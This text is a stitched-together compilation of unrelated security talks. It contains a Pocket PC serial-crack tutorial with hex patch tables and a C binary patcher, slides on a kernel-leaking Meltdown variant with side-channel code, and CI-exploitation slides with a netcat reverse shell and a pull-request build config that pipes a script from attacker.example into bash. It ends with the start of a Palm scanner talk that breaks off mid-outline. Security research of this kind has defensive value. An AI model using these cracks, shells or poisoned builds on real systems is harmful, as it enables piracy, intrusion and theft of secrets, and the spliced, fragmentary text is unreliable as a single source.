(i.e. 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38), and overwrite the entered serial
number in the Memory window. When you are done, your Memory window should look
like figure 12.
Figure 12: Using memory window to update values
Note: Ensure you include the 00 spacers. They are necessary.
The second method a cracker can use is to update the condition flags after the wcscmp
function has updated the status flags. To do this, hit F11 until the pointer is at
0x000112A8. You should note that the Z condition flag changes from Z1 (equal) to Z0
(not equal). However, if you don't like this condition, you can change the flag back to
its original value by overwriting it. Once you do this, the program will once again
think the correct serial number was entered. While this will temporarily fix the serial
check, a lasting solution will require an update to the program's code.
Fortunately, we do not have to look far to find a weak point. The following explains the
rest of the code that is processed until a message is provided on the Pocket PC alerting the
user to a correct, or incorrect, serial number.
260112A8 mov r2, #0
This opcode clears out the R2 register so there are no remaining values that could confuse
future operations.
260112AC movs r3, r0
Moves R0 into R3 and updates the status flags.
In this opcode, two events occur. The first is that R0 is moved into R3. The second event
updates the status flags using the new value in R3. As we previously mentioned, R0
is updated by the wcscmp function. If the entered serial number matched the correct
serial number, R0 will be updated with a 0. If they didn't match, R0 will be set to 1. R3 is
then updated with this value, which is checked to see if it is negative or zero.
260112B0 mov r0, #1
Move #1 into R0
Next, the value #1 is moved into R0. While this may seem a bit odd, by moving the #1
into R0, the program is setting the stage for the next couple lines of code.
260112B4 movne r0, #0
If flags are not equal, move #0 into R0.
Again we see another altered mov command. In this case, the value #0 will only be
moved into R0 if the condition flags are set at 'not equal' (ne), which is based on the status
update performed by the previous movs opcode. In other words, if the serials matched,
R0 would have been set to 0 by wcscmp and the Zero flag would have been set (Z=1),
which means the movne opcode would not be executed.
260112B8 ands r3, r0, #0xFF
Like the movs opcode, the ANDS command will first execute and then update the status
flags depending on the result. Looking at the last couple of lines, we can see that R0 will
be 1 only if the serials DID match: R0 was set to #1 a few lines up, and it is overwritten
with #0 by the MOVNE opcode whenever the serials differ. For a correct serial, the 'AND'
therefore leaves R3 set to #1 and the condition flags are updated to reflect the NOT
EQUAL status (Z=0). If the serials did not match, R0 is 0, R3 becomes 0, and the Zero
flag is set (Z=1, EQUAL).
260112BC ldrne r1, [sp, #8]
Here we see another implementation of the 'not equal' conditional opcode. In this case, if
the ANDS opcode cleared the Z flag (Z=0), which occurs only if the string check passed,
the ldrne opcode loads R1 with the data at SP+8. If you recall from our dissection
of the code in IDA Pro, address 0x0001125C loaded the 'correct
message' into this location of memory. However, if the condition flags are not set at 'not
equal' or 'not zero', this opcode will be skipped.
260112C0 mov r0, r4
Move R4 into R0
An example of a standard straightforward move of R4 into R0.
260112C4 mov r3, #0
Move #0 into R3
Another example of a simple move of #0 to R3.
260112C8 bne 260112F4 ;
If flag not equal jump to 0x260112F4
Again, we see a conditional opcode. In this case, the program will branch to 0x000112F4
if the 'not equal' flag is set. Since the conditional flags have not been updated since the
'ANDS' opcode in address 0x000112B8, a correct serial number would result in the
execution of this opcode.
260112CC ldr r1, [sp, #4]
Load SP+4 into R1 (incorrect message)
If the wrong eight character serial number were entered, this line would load the
'incorrect message' from memory into R1.
260112D0 b 260112F4 ;
Jump to 0x260112F4
This line tells the program to branch to address 0x260112F4.
...
260112F4 bl 26011718 ;
MessageboxW call to display message in R1
The final line we will look at is the call to the Message Box function. This command
simply takes the value in R1, which will either be the correct message or the incorrect
message, and displays it in a Message Box.
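Pulling the walkthrough together, the block from 0x112A8 to 0x112F4 behaves roughly
like the C sketch below. This is an illustrative reconstruction, not decompiler output;
show_message() stands in for the MessageBoxW wrapper at 0x26011718, and all names are
assumptions.

#include <wchar.h>

extern void show_message(const wchar_t *msg);  /* assumed MessageBoxW wrapper */

/* Illustrative reconstruction of the 0x112A8-0x112F4 logic. */
void report_serial(int wcscmp_result,
                   const wchar_t *ok_msg,      /* loaded from SP+8 */
                   const wchar_t *bad_msg)     /* loaded from SP+4 */
{
    int r0, r3;

    r3 = wcscmp_result;           /* MOVS  R3, R0 - sets Z from wcscmp result */
    r0 = 1;                       /* MOV   R0, #1                             */
    if (r3 != 0)                  /* MOVNE R0, #0 - serials differed          */
        r0 = 0;
    r3 = r0 & 0xFF;               /* ANDS  R3, R0, #0xFF - sets Z again       */

    const wchar_t *msg = bad_msg; /* LDR   R1, [SP,#4] on the fail path       */
    if (r3 != 0)                  /* LDRNE R1, [SP,#8] on the pass path       */
        msg = ok_msg;
    show_message(msg);            /* BL 0x26011718 (message box)              */
}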
5.10 The Cracks
Now that we have dissected the code, we need to determine how it can be altered to
ensure that it will accept any serial number as the correct value. As we have illustrated,
'cracking' the serial is a fairly easy task when executing the program in the MVC by
changing the register values, memory, or condition flags during program execution.
However, this type of manhandling is not going to help the average user who has no
interest in reverse-engineering. As a result, a cracker will have to make permanent
changes to the code to ensure the serial validation will ALWAYS validate the entered
serial.
To do this, the cracker has to find a weak point in the code that can be changed to bypass
security checks. Fortunately, for the cracker, there is typically more than one method by
which a program can be cracked. To illustrate, we will demonstrate three distinct ways
that serial.exe can be cracked using various cracking techniques.
5.10.1 Crack 1: Sleight of Hand
The first method we will discuss requires three separate changes to the code. The first
change is at address 0x00011294 where R0 is compared to #8. If you recall, this is used
to ensure that the user provided serial number is exactly eight characters long. The
comparison then updates the condition flags, which are used in the next couple lines to
determine the flow of the program.
To ensure that the flags are set at 'equal', we will need to alter the compared values. The
easiest way to do this is to have the program compare two equal values (i.e. CMP R0,
R0). This will ensure the comparison returns as 'equal', thus tricking the program into
passing over the BLT and BGT opcodes in the next two lines.
The next change is at address 0x000112B4, where we find a movne r0, #0 command. As
we previously discussed, this command checks the flag conditions and if they are set at
'not equal', the opcode moves the value #0 into R0. The R0 value is then checked when it is
moved into R3, which updates the status flags once again.
Since the movs command at address 00112AC will set Z=0 (unless the correct serial is
entered), the movne opcode will execute, thus triggering a chain of events that will result
in a failed validation. To correct this, we will need to ensure the program thinks R0 is
always equal to ‘1’ at line 000112B8 (ands r3, r0, #0xFF). Since R0 would have been
changed to #1 in address 000112B0 (mov r0, #1), the ands opcode would result in a 'not
equal' for a correct serial.
In other words, we need to change movne r0, #0 to movne r0, #1 to ensure that R0 AND
FF outputs ‘1’, which is then used to update the status flags. By doing this, the program
will be tricked into validating the incorrect serial.
Changes:
.text:00011294 CMP R0, #8 -> CMP R0, R0
.text:000112B4 MOVNE R0, #0 -> MOVNE R0,#1
Determining the changes is the first step to cracking a program. The second step is to
actually alter the file. To do this, a cracker uses a hex editor to make changes to the actual
.exe file. However, in order to do this, the cracker must know where in the program file
they need to make changes. Fortunately, if they are using IDA Pro, a cracker only has to
click on the line they want to edit and look at the status bar at the bottom of IDA's
window. As figure 13 illustrate, IDA clearly informs its user what memory address the
currently selected line is located at in a the program, which can be then used in hex
editor.
Figure 13: Viewing location of 0x00011294 for use in hex editor.
Once we know the addresses where we want to make our changes, we will need to
determine the values that we will want to update the original hex code with. Fortunately,
there are several reference guides online that can help with this. In our case, we will want
to make the following changes to the serial.exe file.
IDA Addr   Hex Addr   Orig Opcode    Orig Hex      New Opcode     New Hex
0x11294    0x694      CMP R0, #8     08 00 50 E3   CMP R0, R0     00 00 50 E1
0x112B4    0x6B4      MOVNE R0, #0   00 00 A0 13   MOVNE R0, #1   01 00 A0 13
To make the changes, perform the following procedures (using UltraEdit); a scripted
alternative is sketched below.
1. Open UltraEdit and then open your local serial.exe file in UltraEdit.
2. Using the left most column, locate the desired hex address.
Note: You will not always be able to find the exact address in the hex editor. You will
need to count the character pairs from left to right to find the exact location once you
have located the correct line.
3. Move to the hex code that needs to be changed, and overwrite it.
4. Save the file as a new file, in case you made a mistake.
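As an alternative to a hex editor, the same two Crack 1 patches can be applied
programmatically. The following is a minimal C sketch, assuming only the file offsets
(0x694 and 0x6B4) and byte values from the table above; run it against a copy of
serial.exe:

#include <stdio.h>

/* Write n bytes at a fixed file offset; returns 0 on success. */
static int patch(FILE *f, long off, const unsigned char *b, size_t n)
{
    if (fseek(f, off, SEEK_SET) != 0)
        return -1;
    return fwrite(b, 1, n, f) == n ? 0 : -1;
}

int main(void)
{
    /* CMP R0, #8 -> CMP R0, R0   and   MOVNE R0, #0 -> MOVNE R0, #1 */
    const unsigned char cmp_r0_r0[]  = { 0x00, 0x00, 0x50, 0xE1 };
    const unsigned char movne_r0_1[] = { 0x01, 0x00, 0xA0, 0x13 };

    FILE *f = fopen("serial_copy.exe", "r+b");   /* always patch a copy */
    if (!f) { perror("fopen"); return 1; }

    if (patch(f, 0x694, cmp_r0_r0, 4) != 0 ||
        patch(f, 0x6B4, movne_r0_1, 4) != 0) {
        fprintf(stderr, "patch failed\n");
        fclose(f);
        return 1;
    }
    fclose(f);
    return 0;
}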
5.10.2 Crack 2: The Slide
The next illustration uses some of the same tactics as Crack1, but also introduces a new
method of bypassing the eight-character validation, known as NOP.
The term NOP is a reference to a Non-OPeration, which means the code is basically null.
Many crackers and hackers are familiar with the term NOP due to its prevalence in buffer
overflow attacks. While this is outside the scope of this paper, a NOP sled (as it is often
called) is used to make a part of a program do absolutely nothing. The same NOP sled can
be used when bypassing a security check in a program.
In our program, we have a cmp opcode that compares the length of the entered serial with
the number eight. This results in a status change of the condition flags, which are used by
the next two lines to determine if they are executed. While our previous crack bypassed
this by ensuring the flags were set at 'equal', we can attack the BLT and BGT opcodes by
overwriting them with a NOP opcode. Once we do this, the BLT and BGT opcodes will
no longer exist.
NOTE: Typical NOP code is done using a series of 0x90’s. This will NOT work on an
ARM processor and will result in the following opcode: UMULLLSS R9, R0, R0, R0.
This opcode performs an unsigned multiply long if the LS condition is met, and then
updates the status flags accordingly. It is not a NOP.
To perform a NOP on an ARM processor, you simply replace the target code with a
MOV R1, R1 operation. This will move the value R1 into R1 and will not update the
status flags. In other words, you are killing processor time.
The following code illustrates the NOPing of these opcodes.
.text:00011298 BLT loc_112E4 -> MOV R1, R1
.text:0001129C BGT loc_112E4 -> MOV R1, R1
The second part of this crack was already explained in Crack1, and only requires the
alteration of the MOVNE opcode, as the following portrays.
.text:000112B4 MOVNE R0, #0 -> MOVNE R0,#1
The following describes the changes you will have to make in your hex editor.
IDA Addr   Hex Addr   Orig Opcode     Orig Hex      New Opcode    New Hex
0x11298    0x698      BLT loc_112E4   11 00 00 BA   MOV R1, R1    01 10 A0 E3
0x1129C    0x69C      BGT loc_112E4   10 00 00 CA   MOV R1, R1    01 10 A0 E3
0x112B4    0x6B4      MOVNE R0, #0    00 00 A0 13   MOVNE R0, #1  01 00 A0 13
5.10.3 Crack3: Preventative Maintenance
At this point you are probably wondering what the point is of another example when you
have two that work just fine. However, we have saved the best example for last, because
crack3 does not attack or overwrite any checks or validation opcodes like our previous
two examples. Instead, we demonstrate how to alter the registers to our benefit before any
values are compared.
If you examine the opcode at 0x0001128C using the MVC, you will see that it sets R1
to the address of the serial that you entered. The length of the serial is then loaded into R0
in the next line using R1 as the input variable. If the value pointed to by the address in R1
is eight characters long, it is then bumped up against the correct serial number in the
wcscmp function. Knowing all this, we can see that the value loaded into R1 is a key
piece of data. So, what if we could change the value in R1 to something more agreeable
to the program, such as the correct serial?
While this is possible by using the SP to guide us, the groundwork has already been done
at 0x000112A0, where the correct value is loaded into R0. Logic assumes that if it can
be loaded into R0 using the provided ldr command, then we can use the same command
to load the correct serial into R1. This would in effect trick our validation algorithm to
compare the correct serial with itself, which would always result in a successful match!
The details of the required changes are as follows.
IDA Addr   Hex Addr   Orig Opcode          Orig Hex      New Opcode          New Hex
0x1128C    0x68C      LDR R1, [R4,#0x7C]   7C 10 94 E5   LDR R1, [SP,#0xC]   0C 10 9D E5
Note that this crack only requires the changing of two hex characters (i.e. 7->0 & 4->D).
By far this example is the most elegant and fool proof, which is why we saved it for last.
While the other two examples are just as effective, they are a reactive type of crack that
attempts to fix a problem. This crack, on the other hand, is a preventative crack that
corrects the problem before it becomes one.
6 Summary
This short example of how crackers bypass protection schemes should illustrate quite
clearly the problems that programmers have to consider when developing applications.
While many programmers attempt to include complex serial validation schemes, many of
these eventually end up as a simple wcscmp call that can easily be 'corrected' by a
cracker. In fact, the wcscmp weakness is so common that it has been called 'the weakest
link' by one ARM hacker, in a nice paper available at www.Ka0s.net, which contains
more than enough information to bring a complete newbie up to speed on Pocket PC
application reverse-engineering.
In closing, the subject of ARM reverse-engineering is somewhat new. While much has
been done in the way of Linux ARM debugging, the Pocket PC OS is relatively new
when compared to Intel based debugging. Ironically, the ARM processor is considered
easier to debug. So, get your tools together and dig in!
References
• www.ka0s.net
• www.dataworm.net
• http://www.eecs.umich.edu/speech/docs/arm/ARM7TDMIvE.pdf
• http://www.ra.informatik.uni-stuttgart.de/~ghermanv/Lehre/SOC02/ARM_Presentation.pdf
• class.et.byu.edu/eet441/notes/arminst.ppt
• http://www.ngine.de/gbadoc/armref.pdf
• http://wheelie.tees.ac.uk/users/a.clements/ARMinfo/ARMnote.htm
• http://www3.mb.sympatico.ca/~reimann/andrew/asm/armref.pdf
• www.arm.com
• www.airscanner.com
Mission Impossible
Steal Kernel Data from User Space
Yueqiang Cheng, Zhaofeng Chen, Yulong Zhang, Yu Ding, Tao Wei
Baidu Security
About Speakers
Dr. Tao Wei
Dr. Yueqiang Cheng
Mr. Zhaofeng Chen
Mr. Yulong Zhang
Dr. Yu Ding
Our Security Projects: [project logos]
How to Read Unauthorized Kernel Data
From User Space?
Strong Kernel-User Isolation (KUI)
Enforced by MMU via Page Table
Why is it Hard?
Assume Kernel has NO implementation bug:
No kernel vulnerability to arbitrarily read kernel data
Memory Access in KUI
[Diagram: a virtual address is looked up in the TLB; on a miss, the page table is fetched and the TLB updated; the protection check then either permits the access (yielding the physical address) or denies it, raising a protection fault and SIGSEGV]
Permission Checking
1: Page Table Permissions
2: Control Registers, e.g., SMAP in CR4
[Image from the Intel SDM]
1. Unprivileged App +
2. KUI Permission Checking +
3. Bug-free Kernel
No Way to Go?
However, in order to gain high performance, the CPU relies on its
microarchitecture: Speculative Execution + Out-of-order Execution
Speculative Execution
[Pipeline diagram contrasting no speculative execution, a correct prediction, and a misprediction]
Out-of-order Execution
[Images are from Dr. Lihu Rappoport]
Speculative Execution + Out-of-order Execution: Enough?
Not Enough!!!
Delayed Permission Checking + Cache Side Effects
• Permission checking is delayed to the Retire Unit
• The Branch Predictor in the Front End serves speculative execution
• The Execution Engine executes in an out-of-order way
• Side effects in the cache are still there!!!
[Image from https://www.cse.msu.edu/~enbody/postrisc/postrisc2.htm]
How Meltdown (v3) Works
1. The content of an attacker-chosen memory location, which is inaccessible to the attacker, is loaded into a register.
[Callout: the pointer is made to point to the target kernel address]
2. A transient instruction accesses a cache line based on the secret content of the register.
[Callouts: the access brings the data into the cache; this number should be >= 0x6]
3. The attacker uses Flush+Reload to determine the accessed cache line and hence the secret stored at the chosen memory location.
[Diagram: probe array (ArrayBase) of 256 slots, indices 0-255]
The selected index is the value of the target byte (e.g., if the selected index is 0x65, the value is 'A').
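For reference, the Flush+Reload step is typically implemented along the following lines.
This is a minimal x86 sketch using GCC intrinsics; the page-sized stride, the timing
threshold, and all names are our own assumptions for illustration, not the authors' code.

#include <stdint.h>
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */

#define STRIDE 4096                       /* one slot per page to defeat prefetching */
static uint8_t probe_array[256 * STRIDE];

/* Flush all 256 probe slots out of the cache before the transient access runs. */
static void flush_probe(void)
{
    for (int i = 0; i < 256; i++)
        _mm_clflush(&probe_array[i * STRIDE]);
    _mm_mfence();
}

/* After the transient access, exactly one slot reloads fast; its index is the leaked byte. */
static int recover_byte(void)
{
    unsigned int aux;
    for (int i = 0; i < 256; i++) {
        volatile uint8_t *p = &probe_array[i * STRIDE];
        uint64_t t0 = __rdtscp(&aux);
        (void)*p;
        uint64_t t1 = __rdtscp(&aux);
        if (t1 - t0 < 120)    /* cache-hit threshold: machine dependent (assumption) */
            return i;
    }
    return -1;                /* nothing was cached: retry the whole round */
}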
ForeShadow Attack
Put secrets in L1
Unmap Page Table Entry
Meltdown
How about Spectre (v1/v2)?
How Spectre (v1) Works
1. The setup phase, in which the processor is mistrained to make "an exploitable erroneous speculative prediction," e.g., x < array1_size.
[Callouts: x points to the target address; the slot index of array2 leaks the data; real execution flow and speculative execution both go here]
2. The processor speculatively executes instructions from the target context into a microarchitectural covert channel, e.g., x > array1_size.
[Callouts: the execution flow should go here, but speculative execution goes there anyway; a slot of array2 is loaded into the cache]
3. The sensitive data is recovered. This can be done by timing access to memory addresses in the CPU cache.
[Diagram: probe array (Array2Base) of 256 slots, indices 0-255]
The selected index is the value of the target byte (e.g., if the selected index is 0x66, the value is 'B').
How Spectre Reads Kernel Data
• array1 and array2 are in user-space
• x is controlled by the adversary
• array1 + x points to the secret; the slot index of array2 leaks the kernel data
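The pattern being described is the classic Spectre v1 gadget shape. A minimal sketch,
with names following the slides and sizes chosen purely for illustration:

#include <stdint.h>

uint8_t array1[16];             /* user-space; array1 + x can reach a kernel secret */
uint8_t array2[256 * 4096];     /* user-space probe array, read back with Flush+Reload */
unsigned long array1_size = 16;

/* After the branch is mistrained with in-bounds values of x, an out-of-bounds x is
 * used speculatively, and the secret byte selects which array2 slot gets cached. */
void victim(unsigned long x)
{
    if (x < array1_size)                  /* mispredicted on the attack run */
        (void)array2[array1[x] * 4096];   /* secret-dependent cache load */
}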
1. Unprivileged App +
2. Permission Checking +
3. Bug-free Kernel
Happy! We Get Kernel Data Now
However...
• SMAP stops Spectre (gadget in kernel space)
• KPTI stops Meltdown and Spectre (gadget in user space)
KPTI
[Diagram: before KPTI, kernel space and user space are both mapped in user/kernel mode (PCID helps performance); after KPTI, kernel mode still maps both, but user mode maps only user space]
SMAP
Even if we put the Spectre gadget into the kernel space, SMAP will stop it.
[Diagram: SMAP blocks supervisor-mode (kernel space) accesses to user-mode (user space) memory]
• SMAP is enabled when the SMAP bit in CR4 is set
• SMAP can be temporarily disabled by setting the EFLAGS.AC flag
• SMAP checking is done long before retirement or even execution
Attack and Mitigation Summary

Technique    Steal Kernel Data?   Mitigations    After Mitigation, Kernel Data Leakage?
Spectre      Yes                  KPTI + SMAP    NO
Meltdown     Yes                  KPTI           NO
ForeShadow   Yes                  KPTI           NO

Only for kernel data leakage. For other aspects, the summary is not included here.
Despair...
KPTI + SMAP + KUI
[Image from http://nohopefor.us/credits]
Hope in Despair
[Diagram: even after KPTI, a shared range remains mapped in both user mode and kernel mode; this part cannot be eliminated, and it can serve as a bridge to leak kernel data]
Breaking SMAP + KPTI + user-kernel Isolation
1: Use a new gadget to build a data dependence between the target kernel data
and the bridge (bypass SMAP)
2: Use Reliable Meltdown to probe the bridge to leak kernel data
(bypass KPTI and KUI)
New Variant Meltdown v3z
1st Step: Trigger New Gadget
Similar to the Spectre gadget, but not exactly the same:
• arr1 + x points to the target address
• arr2 + offset is the base of the "bridge"
• the slot index within the "bridge" leaks the data
x and offset must both be controlled by the adversary!!
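A sketch of the gadget shape v3z relies on; unlike plain Spectre v1, both x and offset
are attacker-controlled, and the secret-dependent load lands inside the shared "bridge"
range. All names here are assumptions for illustration:

#include <stdint.h>

extern uint8_t arr1[];            /* arr1 + x points at the target kernel data */
extern uint8_t arr2[];            /* arr2 + offset is the base of the "bridge" */
extern unsigned long arr1_len;

/* Hypothetical kernel-side gadget: the bridge slot index encodes the secret byte. */
void gadget(unsigned long x, unsigned long offset)
{
    if (x < arr1_len)                         /* bound speculatively bypassed   */
        (void)arr2[offset + arr1[x] * 64];    /* touches one bridge cache line  */
}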
How to Trigger the New Gadget
There are many sources to trigger the new gadget
1: Syscalls
2: /proc and /sys etc. interfaces
3: Interrupt and exception handlers
4: eBPF
5: …
How to Find the New Gadget
Source Code Scanning
We use smatch for Linux Kernel 4.17.3:
• Default config: 36 gadget candidates
• Allyes config: 166 gadget candidates
However, there are many restrictions on the gadget in real exploits:
• Offset range
• Controllable invocation
• Cache noise
• …
Binary Code Scanning??
2nd Step: Probe Bridge
[Diagram: a user-space probe array (UserArrayBase, 256 slots) is checked for each of the bridge's 256 slots (BridgeBase)]
Obviously, in each round there are (256*256) probes.
To make the result reliable, usually we need multiple rounds.
Inefficient.
Make it Practical/Efficient
[Diagram: user-space probe array (UserArrayBase) and bridge (BridgeBase), 256 slots each]
Why do we need to probe 256 times in Meltdown?
If we know the value of slot 0 of the BridgeBase, we probe it only once.
Can we know the values in advance?
No for Meltdown (v3)
Meltdown is able to read kernel data, but it requires that the target data is in the CPU L1d cache.
If the target data is NOT in the L1d cache, 0x00 is returned.
We need to read kernel data reliably!
Reliable Meltdown (V3r)
We tested it on Linux 4.4.0 with an Intel E3-1280 v6 CPU, and on MacOS 10.12.6 (16G1036) with an Intel i7-4870HQ CPU.
V3r has two steps:
1st step: bring the data into the L1d cache
2nd step: use v3 to get the data
[Callout: point to the target address — this works everywhere in the kernel]
Put Everything Together
Offline phase:
• Use v3r to dump the bridge data, and save it into a table
Online phase:
• 1st step: Build a data dependence between the target data and a bridge slot
• 2nd step: Probe each slot of the bridge
Efficiency:
• from several minutes (even around 1 hour in certain cases) to only several seconds to leak one byte
Demo Settings
Kernel: Linux 4.4.0 with SMAP + KPTI
CPU: Intel CPU E3-1280 v6
In kernel space, we have a secret msg, e.g., xlabsecretxlabsecret, located at, e.g., 0xffffffffc0e7e0a0
Countermeasure Discussions
Software Mitigations
• Patch the kernel to eliminate all expected gadgets
• Minimize the shared "bridge" region
• Randomize the shared "bridge" region
• Monitor cache-based side channel activities
Countermeasure Discussions
Hardware Mitigations
• Do permission checking during, or even before, the execution stage
• Revise speculative execution and out-of-order execution
• Use a side channel resistant cache, e.g., an exclusive/random cache
• Add a hardware-level side channel detection mechanism
Take Away
• Traditional Spectre and Meltdown can NOT steal kernel data with KPTI + SMAP + KUI enabled.
• Our new Meltdown variant is able to break the strongest protection (KPTI + SMAP + KUI).
• All existing kernels need to be patched to mitigate our new attack.
Mission Impossible
Steal Kernel Data from User Space
[Q&A image is from https://i.redd.it/wbiwgnokgig11.jpg]
Yueqiang Cheng
Baidu Security
Exploiting Continuous Integration (CI) and Automated Build Systems
And introducing CIDER
Whoami
• SpaceB0x
• Sr. Security Engineer at LeanKit
• Application and network security (offense and defense)
• I like breaking in to systems, building systems, and learning
• Security consultant
./agenda.sh
• Overview of Continuous Integration concepts
• Configuration Vulnerabilities vs. Application Vulnerabilities
• Real world exploit #1
• Common Bad-practices
• Real world exploit #2 – Attacking the CI provider
• Introduce CIDER
Continuous Integration
Continuous Integration (CI)
• Quick iterative release of code to production servers
• Usually many iterations per week or even per day
• Repository centric
• In sync with Automated Build
• For infrastructure/servers/subnets etc.
Microservices
• Breaking down a large app into small decoupled components
• These components interact with each other
• Eliminates single points of failure
• Autonomous development
Security Implications
• Good - Frequent release cycles are fabulous!
• Good - Faster code deployments = quick remediation
• Good - Decoupled systems reduce single points of failure
• Good - Compromise of one service doesn't (always) mean full pwnage
• Bad - Fast release sometimes means hasty oversights
• Bad - Automated deployment systems are checked less than the code that they deploy
Tools
Build Systems
• Take code and build conditionally
• Typically in a quasi containerized type of environment
• Both local and cloud based are popular
• Vendors:
  – Travis-CI
  – Circle-CI
  – Drone
  – TeamCity
  – BuildKite
Deployment Systems
• Deploy the code after build
• Heading more and more toward container driven
• Vendors:
  – Jenkins
  – Octopus Deploy
  – Kubernetes
  – Rancher
  – Mesosphere
Chains of Deployment
[Diagram slides illustrating chained build and deployment systems]
Checks in the SDLC
• Build test before merges
• Web-hooks trigger specific actions based on conditions
• Services configured without regard to one another
Configuration Problems
GitHub – Huge attack surface
• Pull requests and commits trigger builds
• Build configurations normally in root of repo
• Thus a build config change can be part of a PR or commit (see the example below)
• Gain control of multiple systems through pull requests
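To make that concrete: a pull request can simply carry a modified build configuration.
A hypothetical poisoned .travis.yml might look like the following; the attacker host and
payload URL are placeholders, and the callback idea mirrors the netcat back-pipe shown
in Real World Hax #1 below:

# Hypothetical malicious .travis.yml delivered via a pull request
language: node_js
node_js:
  - "6"
script:
  # Runs on the build worker as soon as the PR triggers a build
  - curl -s http://attacker.example/payload.sh | bash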
Vulnerabilities are in Misconfiguration
• Creative configuration exploitation
• Vuln stacking at its finest
• Each individual service may be functioning exactly as intended
• Interaction between services is where many vulnerabilities lie
External Repos
• Most volatile attack surface
• Public repositories which map to internal build services
Real World Hax #1
mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc x.x.x.x 4444 1>/tmp/backpipe
nc -l 4444
root
Bad-Practices
Worst-Practices
Environment Vars
• Being used to store credentials
• Storing metadata for other services within micro-service infrastructure
Run everything as root
• Just a container, right guyz?
• You now have internal network access
• Full control to build and augment the image
CI Provider Info leak
• Problems with the CI Providers themselves
• Leaked SSH keys, etc. can compromise other customers on the host
• CI providers have at least some permissions to GitHub repos
• Cloud based CI providers have a hosting environment
• Speaking of which…
Real World Hax #2
Introducing CIDER
What is CIDER?
• Continuous Integration and Deployment ExploiteR
• Framework for exploiting and attacking CI build chains
• Mainly leverages GitHub as attack surface to get to build services
• Takes the mess out of forking, PR-ing, callbacking
• It will poison a handful of build services, with "exploits" for each one
Why CIDER?
• Fun
• Make attacking easy
• Awareness
• RottenApple by @claudijd
• Facilitate further research
CIDER overview
[Screenshots: CIDER – 'help'; CIDER – 'add target' & 'list targets'; CIDER – 'load' and 'info']
CIDER features
• Node.JS
• Built modularly
• Can handle bulk lists of target repos
• Clean up for GitHub repo craziness
• Ngrok – because port forwarding and public IPs suck
Ngrok
Disclaimer
• It is against the GitHub user agreement to test against a repository, even if you have permission from the owner of the repo
• You must be the owner to test a repo
• When testing, ask them to make you an owner
WINK WINK
DEMO
Limitations
• Build Queues
• GitHub Noise
• Timeouts
• Repo API request throttling
Just the beginning…
• More CI-Frameworks
• Start tackling deployment services
• Start exploring other entrypoints
• Other code repositories
• ChatOps (Slack)
Thanks
• LeanKit Operations Team
• Evan Snapp
• @claudijd
Fin
CIDER on GitHub: https://github.com/spaceB0x/cider
Twitter: @spaceB0xx
www.untamedtheory.com
Hacking from the
Palm of your Hand
Paul Clip
DEFCON - August 01, 2003
Agenda
Goals
Past
–
Overview of the Palm Platform
–
Hacker Tools on the Palm
Present
–
AUSTIN - A Palm OS Vulnerability Scanner
–
Architecture
–
Features
–
Demos
–
But wait, there’s more!!!
Future
–
New Features
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
Goals
Overview of Palm OS as a hacking platform
Walkthrough of a Palm OS-based vulnerability scanner
–
Architecture
–
Features & how they’re implemented
–
Lessons learned
Release a new tool for Palm OS
Have Fun!
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
The Past
Trivia Questions:
What was the first
Palm Pilot called?
How much memory
did it have?
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
The Palm Platform
Old
–
Motorola 68K processor
–
Max speed 66MHz
–
RAM 2-16MB
–
Typical resolution 160^2
–
Some color, some b/w screens
–
Serial/USB port
–
IR
–
Some expansion slots
–
PalmOS 4.x and below
New
–
ARM processor
–
Max speed 150? 200? 400?
MHz
–
RAM 16-32MB
–
Typical resolution 320^2
–
All color
–
USB port
–
IR
–
Expansion slots
–
PalmOS 5.x and above
Security Tools
Password Generators
http://www.freewarepalm.com/utilities/passgen.shtml
http://www.freewarepalm.com/utilities/passphrase.shtml
Encryption
http://cryptopad.sourceforge.net/
http://linkesoft.com/secret/
Password Crackers (old)
http://atstake.com/research/tools/password_auditing/
War Dialer
http://atstake.com/research/tools/info_gathering/
Communication Tools
Telnet
http://netpage.em.com.br/mmand/ptelnet.htm
SSH (v1 only)
http://online.offshore.com.ai/~iang/TGssh/
Web & Mail
http://www.eudora.com/internetsuite/
Ping
http://www.mergic.com/vpnDownloads.php
Communication Tools (continued)
FTP
http://lthaler.free.fr/
IR Tools
http://pamupamu.tripod.co.jp/soft/irmenu/irm.htm
http://www.harbaum.org/till/palm/ir_ping/
http://www.pacificneotek.com/omniProfsw.htm
Dev Tools
RPN Calculator
http://nthlab.com/
Longtime
Search on http://palmgear.com/
Filez
http://nosleep.net/
RsrcEdit
http://quartus.net/products/rsrcedit/
OnBoard C
http://onboardc.sourceforge.net/
Useful/Interesting Hardware
Serial/USB cable
Keyboard
GPS
Modem
Expansion slot gadgets
Tilt switch
IR booster
Speedometer
Robotics
…
The Present
Trivia Question:
How many Palm OS
handhelds are in the
market today?
Palm Vulnerability Scanner
Why?
What?
– TCP & UDP scanning
– Multiple hosts/ports
– Banner grabbing
– Save results in re-useable format
– Standalone/self-contained program
What about other scanners?
Choosing a Development Environment…
C / C++
Assembly
CASL
AppForge
NS Basic
Satellite Forms
DB2 Personal App Builder
Java (many flavors)
Forth
PocketStudio (Pascal)
PocketC
Smalltalk
Perl
Python
Even more tools at: http://www.palmos.com/dev/tools/
Technical Features
Must have
– Leverage Palm UI
– Responsive
– Extensible
– Development on PC
Nice to have
– Development on Palm
Most important
– Re-use other components
PocketC
PocketC Overview
Interpreted C-like language
Variable types: int, float, char,
string, pointer
Multi-dimensional arrays
Structs possible through a
(minor) hack
Reasonably fast
Allows development on Palm
+ PC platforms
Extensible
Example:
//helloworld.pc
main()
{
puts(“Hello world!\n”);
}
http://www.orbworks.com/pcpalm/index.html
Extending PocketC
Can be done in two ways
– PocketC include files
– Native (C/C++) libraries
Must-have PocketC library
– Pocket Toolbox by Joe Stadolnik
http://www.geocities.com/retro_01775/PToolboxLib.htm
– Features:
Full access to Palm OS GUI functions
Database functions
Graphic functions
Much more...
Presenting… AUSTIN
AUSTIN stands for
– At Stake
– Ultralight
– Scanning
– Tool (for the)
– Inter-
– Net
P R O P R I E T A R Y B U T N O T C O N F I D E N T I A L
© 2 0 0 3 @ S T A K E , I N C .
AUSTIN Architecture
